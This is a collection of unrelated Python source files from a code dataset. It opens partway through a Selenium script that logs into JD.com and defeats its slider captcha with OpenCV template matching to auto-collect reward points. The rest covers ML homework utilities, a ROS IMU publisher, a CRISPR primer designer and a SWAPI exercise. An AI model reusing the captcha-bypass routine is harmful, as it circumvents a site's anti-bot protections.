r'https://vip.jd.com/'\r\n\t\r\n\tdef exit_jingdong(self, driver):\r\n\t\tself.driver = driver\r\n\t\t\r\n\r\n\tdef get_jd_beans(self, username, secret):\r\n\t\tdriver = self.driver\r\n\t\tdriver.get(self.addr)\r\n\t\tprint(\"===============================\")\r\n\t\tprint((\"%s (%s)\") % (driver.title, username))\r\n\t\tprint(\"===============================\")\r\n\t\t\r\n\t\tself.exitConditition = False\r\n\t\t_thread.start_new_thread(self.click_invalid_window, (self.driver,))\r\n\t\t\r\n\t\tdriver.find_element_by_xpath(\"//div[@class='login-tab login-tab-r']\").click()\r\n\t\tdriver.find_element_by_xpath(\"//input[@id='loginname']\").send_keys(username)\r\n\t\tdriver.find_element_by_xpath(\"//input[@id='nloginpwd']\").send_keys(secret)\r\n\t\tdriver.find_element_by_xpath(\"//div[@class='login-btn']\").click()\r\n\t\t\r\n\t\ttime.sleep(3)\r\n\t\twhile True:\r\n\t\t\t#time.sleep(2)\r\n\t\t\ttry:\r\n\t\t\t\tself.jd_verify(driver)\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"try----\")\r\n\t\t\t\tbreak\r\n\t\ttime.sleep(5)\r\n\t\t\r\n\t\ttry:\r\n\t\t\tif driver.find_element_by_xpath(\"//span[@class='icon-sign']\").is_displayed():\r\n\t\t\t\tdriver.find_element_by_xpath(\"//span[@class='icon-sign']\").click()\r\n\t\t\t\tprint(\"%s---collected JD beans for account %s\" % (get_time(), username))\r\n\t\texcept:\r\n\t\t\tprint(\"%s---failed to collect JD beans for account %s\" % (get_time(), username))\r\n\t\t\tpass\r\n\t\t# Signal the pop-up watcher thread to stop\r\n\t\tself.exitConditition = True\r\n\t\ttime.sleep(1)\r\n\t\r\n\tdef jd_verify(self, driver):\r\n\t\t# XPath of the big background image of the login captcha\r\n\t\ts2 = r'//div/div[@class=\"JDJRV-bigimg\"]/img'\r\n\t\t# XPath of the small slider piece of the login captcha\r\n\t\ts3 = r'//div/div[@class=\"JDJRV-smallimg\"]/img'\r\n\t\tbigimg = driver.find_element_by_xpath(s2).get_attribute(\"src\")\r\n\t\tsmallimg = driver.find_element_by_xpath(s3).get_attribute(\"src\")\r\n\t\t#print(smallimg + '\\n')\r\n\t\t#print(bigimg)\r\n\t\t# Filename for the big background image\r\n\t\tbackimg = \"backimg.png\"\r\n\t\t# Filename for the slider piece\r\n\t\tslideimg = \"slideimg.png\"\r\n\t\t# Download the big background image and save it locally\r\n\t\turllib.request.urlretrieve(bigimg, backimg)\r\n\t\t# Download the slider piece and save it locally\r\n\t\turllib.request.urlretrieve(smallimg, slideimg)\r\n\t\t# Load both images as grayscale\r\n\t\tblock = cv2.imread(slideimg, 0)\r\n\t\ttemplate = cv2.imread(backimg, 0)\r\n\t\t# Filenames for the binarized images\r\n\t\tblockName = \"block.jpg\"\r\n\t\ttemplateName = \"template.jpg\"\r\n\t\t# Save the binarized images\r\n\t\tcv2.imwrite(blockName, block)\r\n\t\tcv2.imwrite(templateName, template)\r\n\t\tblock = cv2.imread(blockName)\r\n\t\tblock = cv2.cvtColor(block, cv2.COLOR_RGB2GRAY)\r\n\t\tblock = abs(255 - block)\r\n\t\tcv2.imwrite(blockName, 
block)\r\n\t\tblock = cv2.imread(blockName)\r\n\t\ttemplate = cv2.imread(templateName)\r\n\t\t# 获取偏移量\r\n\t\tresult = cv2.matchTemplate(block, template, cv2.TM_CCOEFF_NORMED) # 查找block在template中的位置,返回result是一个矩阵,是每个点的匹配结果\r\n\t\tx, y = np.unravel_index(result.argmax(), result.shape)\r\n\t\t#print(\"x方向的偏移\", int(y * 0.4 + 18), 'x:', x, 'y:', y)\r\n\t\t# 获取滑块\r\n\t\telement = driver.find_element_by_xpath(s3)\r\n\t\tActionChains(driver).click_and_hold(on_element=element).perform()\r\n\t\tActionChains(driver).move_to_element_with_offset(to_element=element, xoffset=y, yoffset=0).perform()\r\n\t\tActionChains(driver).release(on_element=element).perform()\r\n\t\ttime.sleep(3)\r\n\r\n\tdef click_invalid_window(self,driver):\r\n\t\twhile True:\r\n\t\t\tif(self.exitConditition == True):\r\n\t\t\t\tbreak\r\n\t\t\ttime.sleep(0.2)\r\n\t\t\t\t\t\r\n\t\t\ttry:\r\n\t\t\t\tif driver.find_element_by_xpath(\"//a[@class='ui-dialog-close']\").is_displayed():\r\n\t\t\t\t\tdriver.find_element_by_xpath(\"//a[@class='ui-dialog-close']\").click()\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\r\n\r\nif __name__ == '__main__':\r\n\tprint(str(sys.argv[0]) + \" enter\")","sub_path":"PythonTools/Common/web_common.py","file_name":"web_common.py","file_ext":"py","file_size_in_byte":10747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"435352875","text":"import numpy as np\nfrom typing import List\nfrom hw1_knn import KNN\n\n#TODO: Information Gain function\ndef Information_Gain(S, branches):\n #sum of items in each attribute value \n totalSumAttribute=[0]*len(branches)\n #total sum for this attribute\n totalsum=0\n ig=0\n for i in range(len(branches)):\n tempsum=0\n for j in range(len(branches[0])):\n totalSumAttribute[i]+=branches[i][j]\n totalsum+=branches[i][j]\n \n totalEntropySum=0\n for i in range(len(branches)):\n #print(totalSumAttribute[i], branches[i], totalsum)\n currentEntropy=entropy(totalSumAttribute[i],branches[i])\n #print(currentEntropy)\n totalEntropySum+=(totalSumAttribute[i]/totalsum)*currentEntropy\n #print(\"entropy\", S, \"totalEntropySum\", totalEntropySum)\n return round(S-totalEntropySum,10)\n\n # branches: List[List[any]]\n # return: float\n \ndef entropy(totalsum, labels):\n entropy=0\n for i in range(len(labels)):\n #print(labels[i], totalsum)\n fraction=labels[i]/totalsum\n if fraction==0:\n continue\n entropy+=-1*fraction*np.log2(fraction)\n #print(\"entropy\",entropy)\n return entropy\n \n\n\n# TODO: implement reduced error prunning function, pruning your tree on this function\ndef reduced_error_prunning(decisionTree, X_test, y_test):\n # decisionTree\n # X_test: List[List[any]]\n # y_test: List\n decisionTree.root_node.expectedLabels=y_test\n\n dTree=prune_tree(decisionTree,X_test, y_test) \n #print_tree(dTree)\n decisionTree=dTree\n return\n\ndef find_accuracy(y_test, y_test_predicted):\n correct=0\n for i in range(len(y_test)):\n if y_test[i]==y_test_predicted[i]:\n correct+=1\n return correct\n\ndef prune_tree(dTree,X_test, y_test):\n \n dTree.root_node.zeroOutCorrectPredictions()\n dTree.predict(X_test)\n \n #existingDTree=copy.deepcopy(dTree)\n \n #print_tree(existingDTree)\n \n \n max_node, max_accuracy=findNodeWithMaximumAccuracy(dTree.root_node, 0 , None)\n \n #print(max_node.attribute_val, max_accuracy)\n \n if max_node!=None:\n max_node.children=[]\n max_node.splittable=False\n prune_tree(dTree,X_test, y_test)\n \n return dTree\n\n #if treeNode==None:\n # return\n \"\"\"\n expectedLabelMap=dict()\n tempNode= tree\n parents=[]\n \n 
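# The measurement step of jd_verify above in isolation (a sketch, with
# placeholder file names): template-match the slider piece against the
# background to recover the horizontal drag offset. Note that OpenCV expects
# the search image first and the smaller template second.
import cv2
import numpy as np

def slider_offset(background_path, block_path):
    background = cv2.imread(background_path)
    block = cv2.imread(block_path)
    # Each entry of `result` scores how well the block matches at that position.
    result = cv2.matchTemplate(background, block, cv2.TM_CCOEFF_NORMED)
    # argmax over the score map; unravel_index turns it back into (row, col).
    row, col = np.unravel_index(result.argmax(), result.shape)
    return col  # x offset, in pixels, to drag the slider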
findAllParents(tree, parents)\n print('parents',len(parents))\n\n parent_with_max_accuracy=None\n max_accuracy=0\n class_with_max_value=None\n for i in range(len(parents)):\n currentChildren=parents[i].children\n correctLabelsBeforePruning=0\n incorrectLabelsBeforePruning=0\n currentParentMap=dict()\n for j in range(len(currentChildren)):\n predictedClass=currentChildren[j].cls_max\n expectedLabelMap=currentChildren[j].expectedLabelMap\n #print(\"expectedLabelMap\",expectedLabelMap, predictedClass)\n if(expectedLabelMap ==None):\n continue\n else:\n if expectedLabelMap.get(predictedClass) !=None:\n correctLabelsBeforePruning+=expectedLabelMap.get(predictedClass)\n for key,value in expectedLabelMap.items():\n if key!=predictedClass:\n incorrectLabelsBeforePruning+=value\n else:\n correctLabelsBeforePruning+=value\n if currentParentMap.get(key)==None:\n currentParentMap[key]=value\n else:\n currentParentMap[key]+=value \n maximum_class= parents[i].cls_max\n current_value=currentParentMap.get(maximum_class)\n if current_value!=None and current_value>correctLabelsBeforePruning and max_accuracymax_accuracy:\n max_accuracy=gain\n max_node=currentNode\n #print('max_accuracy', max_accuracy, 'max_node', max_node.attribute_val)\n \n if currentNode.splittable:\n #print('children found')\n for i in currentNode.children:\n print('children',i)\n node, accuracy= findNodeWithMaximumAccuracy(i, max_accuracy, max_node)\n if accuracy>max_accuracy:\n max_accuracy=accuracy\n max_node=node \n \n return max_node, max_accuracy\n \n \ndef findAllParents(tree, parents):\n tempChildrenList=tree.children\n #print('list',tempChildrenList)\n if len(tempChildrenList)==0:\n return True\n #print('enter', tempChildrenList)\n allChildLeaves=True\n for i in range(len(tempChildrenList)):\n if not findAllParents(tempChildrenList[i], parents):\n allChildLeaves=False\n break;\n if allChildLeaves:\n parents.append(tree)\n #print('finished')\n return False\n \n \n# print current tree\ndef print_tree(decisionTree, node=None, name='branch 0', indent='', deep=0):\n if node is None:\n node = decisionTree.root_node\n print(name + '{')\n\n print(indent + '\\tdeep: ' + str(deep))\n string = ''\n #print(\"attribute\",node.attributeValue)\n for idx_cls in range(node.num_cls):\n string += str(node.labels.count(idx_cls)) + ' : '\n print(indent + '\\tnum of samples for each class: ' + string[:-2])\n \n #print(indent+'expectedLabelMap='+str(node.expectedLabelMap))\n if node.splittable:\n print(indent + '\\tsplit by dim {:d}'.format(node.dim_split))\n for idx_child, child in enumerate(node.children):\n print_tree(decisionTree, node=child, name='\\t' + name + '->' + str(idx_child), indent=indent + '\\t', deep=deep+1)\n else:\n print(indent + '\\tclass:', node.cls_max)\n print(indent + '}')\n\n \n\n#TODO: implement F1 score\ndef f1_score(real_labels: List[int], predicted_labels: List[int]) -> float:\n assert len(real_labels) == len(predicted_labels)\n truepos=np.sum(np.multiply(real_labels,predicted_labels))\n trueneg=np.sum(np.multiply((np.logical_not(real_labels)),(np.logical_not(predicted_labels))))\n falsepos=np.sum(np.multiply((np.logical_not(real_labels)),(predicted_labels)))\n falseneg=np.sum(np.multiply((real_labels),(np.logical_not(predicted_labels))))\n if(truepos+falseneg)==0 or (truepos+falsepos)==0:\n return 0\n recall=truepos/(truepos+falseneg)\n precision=truepos/(truepos+falsepos)\n if (recall+precision)==0:\n return 0\n return 2*(precision*recall)/(recall+precision)\n\ndef euclidean_distance(point1: List[float], point2: 
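# A worked check (not from the original homework file) of the entropy /
# Information_Gain pair defined earlier in this file: splitting [4+, 4-] into
# branches [3+, 1-] and [1+, 3-] should give IG = 1 - H(3/4, 1/4) ~= 0.18872.
import numpy as np

def branch_entropy(counts):
    total = sum(counts)
    return -sum((c / total) * np.log2(c / total) for c in counts if c)

parent = branch_entropy([4, 4])  # 1.0 bit
children = [[3, 1], [1, 3]]
weighted = sum(sum(b) / 8 * branch_entropy(b) for b in children)
assert abs((parent - weighted) - 0.18872) < 1e-4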
List[float]) -> float:\n #print(\"euclidean_distance\", point1, point2)\n subtract=np.subtract(point1,point2) \n result =np.array(subtract**2, dtype=np.float128)\n return np.sqrt(np.sum(result, axis=0)) \n\n\ndef inner_product_distance(point1: List[float], point2: List[float]) -> float:\n #print(\"inner_product_distance\", point1, point2)\n result=np.array(np.dot(point1,point2), dtype=np.float128)\n return result\n\n\ndef gaussian_kernel_distance(point1: List[float], point2: List[float]) -> float:\n #print(\"gaussian_kernel_distance\", point1, point2)\n return -1*np.exp((np.dot(np.subtract(point1,point2), np.subtract(point1,point2)) / -2))\n\n\n#TODO:\ndef cosine_sim_distance(point1: List[float], point2: List[float]) -> float:\n #print(\"cosine_sim_distance\", point1, point2)\n return 1-(np.array(np.dot(point1,point2),dtype=np.float64)/(np.linalg.norm(point1)*np.linalg.norm(point2)))\n\n\n# TODO: select an instance of KNN with the best f1 score on validation dataset\ndef model_selection_without_normalization(distance_funcs, Xtrain, ytrain, Xval, yval):\n # distance_funcs: dictionary of distance funtion\n # Xtrain: List[List[int]] train set\n # ytrain: List[int] train labels\n # Xval: List[List[int]] validation set\n # yval: List[int] validation labels\n # return best_model: an instance of KNN\n # return best_k: best k choosed for best_model\n # return best_func: best function choosed for best_model\n #print(distance_funcs)\n best_k=-1\n best_score_train=0\n best_score_val=-1 \n best_distance=\"\"\n best_model=None\n #print(len(Xtrain), len(Xval))\n if len(Xtrain)<=30:\n K=len(Xtrain)-1\n else:\n K=30\n for key,val in distance_funcs.items():\n k=1\n while k<=K:\n kNN = KNN(k,val)\n #print(\"train\")\n kNN.train(Xtrain, ytrain)\n #print('Xval before prediction')\n yval_pred=kNN.predict(Xval) \n #print(\"predict1\")\n valid_f1_score=f1_score(yval,yval_pred)\n #print(\"f1_Score1\")\n ytrain_pred=kNN.predict(Xtrain)\n #print(\"predict2\")\n train_f1_score=f1_score(ytrain,ytrain_pred)\n #print(\"f1_Score2\")\n print(best_score_val, valid_f1_score, k, best_k)\n if best_score_val List[List[float]]:\n \"\"\"\n normalize the feature vector for each sample . For example,\n if the input features = [[3, 4], [1, -1], [0, 0]],\n the output should be [[0.6, 0.8], [0.707107, -0.707107], [0, 0]]\n \n for i in range(len(features)):\n currentSum=0;\n for j in range(len(features[0])):\n currentSum+= (features[i][j]*features[i][j]) \n currentSum=np.sqrt(currentSum)\n if currentSum!=0:\n for j in range(len(features[0])):\n features[i][j]=features[i][j]/currentSum\n \n return features\"\"\"\n col_sums = np.linalg.norm(features, axis=1)\n #print(col_sums[:,np.newaxis])\n return [x/y if y else np.zeros((len(x))) for x,y in zip(features,col_sums[:,np.newaxis])]\n #return np.divide(features, col_sums[:,np.newaxis])\n\n\n\nclass MinMaxScaler:\n \"\"\"\n You should keep some states inside the object.\n You can assume that the parameter of the first __call__\n must be the training set.\n\n Hints:\n 1. Use a variable to check for first __call__ and only compute\n and store min/max in that case.\n\n Note:\n 1. 
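# A quick check (not from the original file) of the row normalization performed
# by normalize() above: divide each sample by its L2 norm and leave all-zero
# rows untouched, matching the docstring's example.
import numpy as np

features = np.array([[3.0, 4.0], [1.0, -1.0], [0.0, 0.0]])
norms = np.linalg.norm(features, axis=1, keepdims=True)
normalized = np.divide(features, norms, out=np.zeros_like(features), where=norms != 0)
assert np.allclose(normalized[0], [0.6, 0.8])
assert np.allclose(normalized[2], [0.0, 0.0])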
You may assume the parameters are valid when __call__\n is being called the first time (you can find min and max).\n\n Example:\n train_features = [[0, 10], [2, 0]]\n test_features = [[20, 1]]\n\n scaler = MinMaxScale()\n train_features_scaled = scaler(train_features)\n # now train_features_scaled should be [[0, 1], [1, 0]]\n\n test_features_sacled = scaler(test_features)\n # now test_features_scaled should be [[10, 0.1]]\n\n new_scaler = MinMaxScale() # creating a new scaler\n _ = new_scaler([[1, 1], [0, 0]]) # new trainfeatures\n test_features_scaled = new_scaler(test_features)\n # now test_features_scaled should be [[20, 1]]\n \"\"\"\n def __init__(self):\n self.min_a=[]\n self.max_a=[]\n \n\n def __call__(self, features: List[List[float]]) -> List[List[float]]:\n \"\"\"\n normalize the feature vector for each sample . For example,\n if the input features = [[2, -1], [-1, 5], [0, 0]],\n the output should be [[1, 0], [0, 1], [0.333333, 0.16667]]\n \"\"\"\n #print(len(features))\n if len(self.min_a) == 0:\n self.min_a=np.min(features, axis=0)\n self.max_a=np.max(features, axis=0)\n \n result=list()\n diff=self.max_a-self.min_a\n for i in range(len(features)):\n temp=[]\n for j in range(len(features[0])):\n if(diff[j]==0):\n # print('diff is zero')\n temp.append(0)\n else:\n div=(features[i][j]-self.min_a[j])/diff[j]\n temp.append(div)\n result.append(temp)\n return result\n #return np.nan_to_num(np.divide(np.subtract(features,self.min_a),diff))\n\n","sub_path":"knn and decision trees/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"368889515","text":"#! /usr/bin/env python\n__author__=\"Ojit\"\nimport requests , sys , time , urllib , json \nimport rospy\nfrom sensor_msgs.msg import Imu, LaserScan\n\nrospy.init_node(\"imu_from_web\",anonymous=True)\n\nclass Main(object):\n def __init__(self, url_arg=\"10.60.8.174:8080\"):\n self.host_url=\"http://\"+url_arg+\"/sensors.json\"\n print(\"URL set to:\",self.host_url)\n self.imu_pub = rospy.Publisher(\"/imu0\", Imu , queue_size=10)\n self.req = requests.get(self.host_url)\n self.imu_message = Imu()\n self.gyro_mean_read = [0,0,0]\n self.accel_mean_read = [0,0,0]\n self.hist_gyro = [0,0,0]\n self.hist_accel= [0,0,-9.8]\n self.rate=rospy.Rate(200)\n print(\"init complete\")\n\n\n def get_data(self):\n self.count=0\n # [u'battery_level', u'gyro', u'proximity', u'battery_voltage', u'gravity', u'accel', u'battery_temp', u'rot_vector', u'mag', u'light', u'lin_accel']\n \n while not rospy.is_shutdown():\n # send request to server and get data in json \n # self.req = requests.get(self.host_url,params={'gyro':'gyro','lin_accel':'lin_accel'})\n # raw_data = self.req.json()\n try:\n self.url_req = urllib.urlopen(self.host_url)\n self.raw_data = json.loads(self.url_req.read())\n except Exception as e:\n print(e)\n # self.req = grequests.get(self.host_url)\n # self.responses = grequests.map(self.req)\n # raw_data = self.responses[0].json()\n \n # get past values of raw gyro and accel data\n self.gyro_mean_read = self.raw_data['gyro']['data'][-1][1]\n self.accel_mean_read = self.raw_data['accel']['data'][-1][1]\n self.set_vals()\n\n #publish data\n self.imu_pub.publish(self.imu_message)\n # self.count+=1\n\n\n def set_vals(self):\n #Set data\n self.imu_message = Imu()\n self.imu_message.header.stamp = rospy.Time().now()\n\n self.imu_message.angular_velocity.x = self.gyro_mean_read[0]\n self.imu_message.angular_velocity.y = 
self.gyro_mean_read[1]\n self.imu_message.angular_velocity.z = self.gyro_mean_read[2]\n\n self.imu_message.linear_acceleration.x = self.accel_mean_read[0]\n self.imu_message.linear_acceleration.y = self.accel_mean_read[1]\n self.imu_message.linear_acceleration.z = self.accel_mean_read[2]\n\n\n\n\nif __name__ == \"__main__\":\n # try:\n i = Main(sys.argv[1])\n i.get_data()\n # except Exception as e:\n # print(\"provide url after hosting on web. Follow Readme\")\n # print(e)\n","sub_path":"scripts/temp_testing.py","file_name":"temp_testing.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"130824338","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\n\n# load mnist\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist= input_data.read_data_sets(\"MNIST/\", one_hot= True)\n\n# load model\nfname= \"./tmp/model.ckpt.meta\"\n\n# load the saved graph\nnew_saver= tf.train.import_meta_graph(fname)\nwith tf.Session() as sess:\n # restore saved internal variables\n new_saver.restore(sess,tf.train.latest_checkpoint(\"./tmp\"))\n # get saved variables\n in_vars= tf.get_collection(\"inputs\")\n test_vars= tf.get_collection(\"tests\")\n \n acc_test= sess.run(test_vars[1], \n feed_dict={in_vars[0]:mnist.test.images,\n in_vars[1]:mnist.test.labels})\n print (\"Test accuracy: %.4f\"%(acc_test))\n","sub_path":"loadModel.py","file_name":"loadModel.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"351872322","text":"from termcolor import colored\n\n\nclass Designer():\n\n gRNA = ''\n cutsite_index = ''\n stop_codon = ''\n three_letter_stop = ''\n sequence = ''\n hom_arm_left = ''\n hom_arm_right = ''\n forward_primer = ''\n second_forward_primer = ''\n\n reverse_primer_one = ''\n reverse_primer_two = ''\n rev_primer_one_complement = ''\n second_primer_complement = ''\n\n def __init__(self, gRNA='', stop_codon='', forward_primer='', second_forward_primer='', rev_primer_one='', rev_primer_two='', file_name='', hom_arm_length=0):\n\n # minus one because you are going to be deleting the '|'\n self.cutsite_index = gRNA.index('|') - 1\n self.gRNA = gRNA.replace('|', '')\n self.stop_codon = stop_codon\n self.three_letter_stop = stop_codon[-3:]\n\n with open(file_name, 'r') as f:\n self.sequence = f.read().replace('\\n', '')\n\n self.sequence = self.sequence.rstrip()\n\n self.forward_primer = forward_primer\n self.second_forward_primer = second_forward_primer\n self.reverse_primer_one = rev_primer_one\n self.reverse_primer_two = rev_primer_two\n self.rev_primer_one_complement = self.complement(rev_primer_one)\n self.second_primer_complement = self.complement(rev_primer_two)\n\n # need to add 1 because looking at point in between the cutsite\n gRNA_index = self.sequence.index(self.gRNA) + self.cutsite_index + 1\n\n self.stop_codon_index = self.sequence.index(self.stop_codon) + self.stop_codon.index(self.three_letter_stop)\n\n self.hom_arm_left = self.sequence[(gRNA_index - hom_arm_length): gRNA_index]\n self.hom_arm_right = self.sequence[gRNA_index: (gRNA_index + hom_arm_length)]\n\n self.validateSequences()\n\n def validateSequences(self):\n\n if self.hom_arm_left in self.sequence and self.hom_arm_right in self.sequence:\n print('homology arm validation passed')\n else:\n self.printError('homology arm validation failed')\n\n if self.stop_codon in self.sequence:\n print('stop codon validation passed')\n 
else:\n self.printError('stop codon validation failed')\n\n if self.forward_primer in self.sequence:\n print('forward primer validation passed')\n else:\n self.printError('forward primer validation failed')\n\n if self.second_forward_primer in self.sequence:\n print('second forward primer validation passed')\n else:\n self.printError('second forward primer validation failed')\n\n if self.rev_primer_one_complement in self.sequence:\n print('reverse primer one complement validation passed')\n else:\n self.printError('reverse primer one validation failed')\n\n if self.second_primer_complement in self.sequence:\n print('reverse primer two complement validation passed')\n else:\n self.printError('reverse primer two validation failed')\n\n if self.sequence[(self.sequence.index(self.gRNA) + len(self.gRNA) + 1):self.sequence.index(self.gRNA) + len(self.gRNA) + 3] != 'GG':\n\n print(colored('Warning: ', 'red') + 'gRNA site is not immediately upstream of canonical Cas9 PAM Site(NGG). Ignore this if you are using not using spCas9.')\n\n # testing the output string\n self.print_sequence(colored=lambda x, y: x, test=True)\n\n def writeHomArmToFile(self, save_file_left, save_file_right):\n with open(save_file_left, 'w') as f:\n f.write(self.hom_arm_left)\n\n with open(save_file_right, 'w') as f:\n f.write(self.hom_arm_right)\n\n def print_sequence(self, colored=colored, test=False, upstream_margin=100, downstream_margin=50):\n\n output_string = ''\n\n # creating indexes for important features\n fp_index = self.sequence.index(self.forward_primer)\n rp_index = self.sequence.index(self.rev_primer_one_complement)\n second_primer_index = self.sequence.index(self.second_forward_primer)\n second_primer_complement_index = self.sequence.index(self.second_primer_complement)\n gRNA_print_index = self.sequence.index(self.gRNA)\n\n # forward primer one printing\n output_string += self.sequence[fp_index - upstream_margin: fp_index]\n output_string += colored(self.forward_primer, 'blue')\n output_string += self.sequence[fp_index + len(self.forward_primer): rp_index]\n\n # reverse primer one printing\n output_string += colored(self.rev_primer_one_complement, 'yellow')\n output_string += self.sequence[rp_index + len(self.rev_primer_one_complement): gRNA_print_index]\n\n # gRNA printing\n output_string += colored(self.gRNA, 'green')\n\n # stop codon and second forward primer printing\n\n # If forward primer for downstream homology arm is overlapping with the stop codon\n if self.stop_codon_index > second_primer_index and self.stop_codon_index < second_primer_index + len(self.second_forward_primer):\n output_string += self.sequence[gRNA_print_index + len(self.gRNA): second_primer_index]\n three_stop_index = self.second_forward_primer.index(self.three_letter_stop)\n output_string += colored(self.second_forward_primer[: three_stop_index], 'blue')\n output_string += colored(self.three_letter_stop, 'red')\n output_string += colored(self.second_forward_primer[three_stop_index + len(self.three_letter_stop):], 'blue')\n output_string += self.sequence[second_primer_index + len(self.second_forward_primer): second_primer_complement_index]\n\n else:\n output_string += self.sequence[gRNA_print_index + len(self.gRNA):self.stop_codon_index]\n output_string += colored(self.sequence[self.stop_codon_index:self.stop_codon_index + 3], 'red')\n\n # printing second primer\n output_string += self.sequence[self.stop_codon_index + 3:second_primer_index]\n output_string += colored(self.sequence[second_primer_index: second_primer_index + 
len(self.second_forward_primer)], 'blue')\n output_string += self.sequence[second_primer_index + len(self.second_forward_primer): second_primer_complement_index]\n\n output_string += colored(self.second_primer_complement, 'yellow')\n output_string += self.sequence[second_primer_complement_index + len(self.second_primer_complement): second_primer_complement_index + len(self.second_primer_complement) + downstream_margin]\n\n if test:\n if output_string in self.sequence:\n print('output string validation passed')\n else:\n print('output string validation failed')\n return\n\n # getting homology arm lengths\n\n gRNA_index = self.sequence.index(self.gRNA) + self.cutsite_index + 1\n hom_arm_length_left = gRNA_index - fp_index\n\n hom_arm_length_right = second_primer_complement_index + len(self.second_primer_complement) - gRNA_index\n\n # gettign difference from cut site\n left_difference = gRNA_index - (rp_index + len(self.rev_primer_one_complement))\n right_difference = second_primer_index - gRNA_index\n\n # printing\n print()\n print()\n print('gRNA cut site: ' + self.gRNA[:self.cutsite_index + 1] + colored('|', 'cyan') + self.gRNA[self.cutsite_index + 1:])\n print('Left Homology Arm: {} bp -> {} bp from gRNA cut site'.format(hom_arm_length_left, left_difference))\n print('Right Homology Arm: {} bp -> {} bp from gRNA cut site'.format(hom_arm_length_right, right_difference))\n print('-----------------------------------------------------')\n print('forward primer = ' + colored('blue', 'blue'))\n print('reverse primer = ' + colored('yellow', 'yellow'))\n print('gRNA = ' + colored('green', 'green'))\n print('stop codon = ' + colored('red', 'red'))\n print(output_string)\n\n def complement(self, sequence, three_to_five=False):\n complements = {'A': 'T', 'G': 'C', 'T': 'A', 'C': 'G'}\n # have to flip bases AND reverse since its on opposite strand\n if three_to_five:\n # don't flip it want it 3' -> 5'\n return ''.join([complements[x] for x in sequence])\n else:\n return ''.join([complements[x] for x in sequence])[:: -1]\n\n def printPrimersPlusGibson(self):\n forward_gibson_one = colored('TCCCCGACCTGCAGCCCAGCT', 'magenta')\n forward_gibson_two = colored('AGTTCTTCTGATTCGAACATC', 'magenta')\n rev_gibson_two = colored('TGGAGAGGACTTTCCAAG', 'magenta')\n\n # this is the codon immediately upstream of stop codon(have to complement since this is obtained from positive strand)\n NNN = self.complement(self.sequence[(self.stop_codon_index - 3):self.stop_codon_index])\n rev_gibson_one = colored('CCGGAACCTCCTCCGCTCCC' + NNN, 'magenta')\n\n print('\\n------Primers With Gibson Sequences: ')\n print('Forward Primer One: ' + forward_gibson_one + self.forward_primer + \" (5' -> 3')\")\n print('Reverse Primer One: ' + rev_gibson_one + self.reverse_primer_one + \" (5' -> 3')\")\n print('Forward Primer Two: ' + forward_gibson_two + self.second_forward_primer + \" (5' -> 3')\")\n print('Reverse Primer Two: ' + rev_gibson_two + self.reverse_primer_two + \" \\t(5' -> 3')\")\n\n def printgRNAWithOverhang(self):\n top_overhang_five_prime_end = 'CACC'\n bottom_overhang_five_prime_end = 'CAAA'\n\n # have to add G to 5' end of top-strand and C to 3' end of bottom strand b/c that G-C pair is necessary for the U6 promoter(according to paper)\n print('\\n------gRNAs with overhang and added G-C base pair: ')\n print('Top Strand: ' + colored(top_overhang_five_prime_end, 'magenta') + colored('G', 'cyan') + self.gRNA + \"\\t (5' -> 3')\")\n print('Bottom Strand: ' + colored('C', 'cyan') + self.complement(self.gRNA, three_to_five=True) 
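# A standalone reverse-complement with the same convention as complement() above
# (a sketch, not the class method): pair each base, then flip the order unless
# the 3'->5' orientation is requested.
def reverse_complement(sequence, three_to_five=False):
    pairs = {'A': 'T', 'G': 'C', 'T': 'A', 'C': 'G'}
    complemented = ''.join(pairs[base] for base in sequence)
    # 3'->5' keeps base order; the default flips onto the 5'->3' strand.
    return complemented if three_to_five else complemented[::-1]

assert reverse_complement('GATTC') == 'GAATC'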
+ colored(bottom_overhang_five_prime_end, 'magenta') + \" (3' -> 5')\")\n\n def printError(self, s):\n print(colored('Error: ', 'red') + s)\n\n\nif __name__ == '__main__':\n print(colored('Error: ', 'red') + 'Please run main.py')\n\n","sub_path":"code/Designer.py","file_name":"Designer.py","file_ext":"py","file_size_in_byte":10192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"636166634","text":"import requests, json\n\n# PROBLEM SET 09\n\nENDPOINT = 'https://swapi.py4e.com/api'\n\n# BEGIN ASSIGNMENT:\n\n# PROBLEM 01: Finish get_swapi_resource.\ndef get_swapi_resource(url, params=None):\n \"\"\"This function initiates an HTTP GET request to the SWAPI service in order to return a\n representation of a resource. The function defines two parameters, the resource url (str) and\n an optional params (dict) query string of key:value pairs may be provided as search terms\n (e.g., {'search': 'yoda'}). If a match is obtained from a search, be aware that the JSON object\n that is returned will include a list property named 'results' that contains the resource(s)\n matched by the search query term(s).\n\n Parameters:\n resource (str): a url that specifies the resource.\n params (dict): optional dictionary of querystring arguments. This parameter should\n have a default value of None.\n\n Returns:\n dict: dictionary representation of the decoded JSON.\n \"\"\"\n\n if params:\n response = requests.get(url, params=params).json()\n else:\n response = requests.get(url).json()\n\n return response\n\n\n# PROBLEM 02: Finish read_json\ndef read_json(filepath):\n \"\"\"This function reads a JSON document and returns a dictionary if provided with a valid\n filepath.\n\n Parameters:\n filepath (str): path to file.\n\n Returns:\n dict: dictionary representations of the decoded JSON document.\n \"\"\"\n\n with open(filepath, 'r', encoding='utf-8') as file_obj:\n data = json.load(file_obj)\n\n return data\n\n\n# PROBLEM 03: Finish write_json\ndef write_json(filepath, data):\n \"\"\"Given a valid filepath writes data to a JSON file.\n\n Parameters:\n filepath (str): the path to the file.\n data (dict): the data to be encoded as JSON and written to the file.\n\n Returns:\n None\n \"\"\"\n\n with open(filepath, 'w', encoding='utf-8') as file_obj:\n json.dump(data, file_obj, ensure_ascii=False, indent=2)\n\n\n# PROBLEM 04: Create the __init__, __str__, and evaluate_information methods to Person\nclass Person():\n \"\"\"\n This class contains all of the information that the 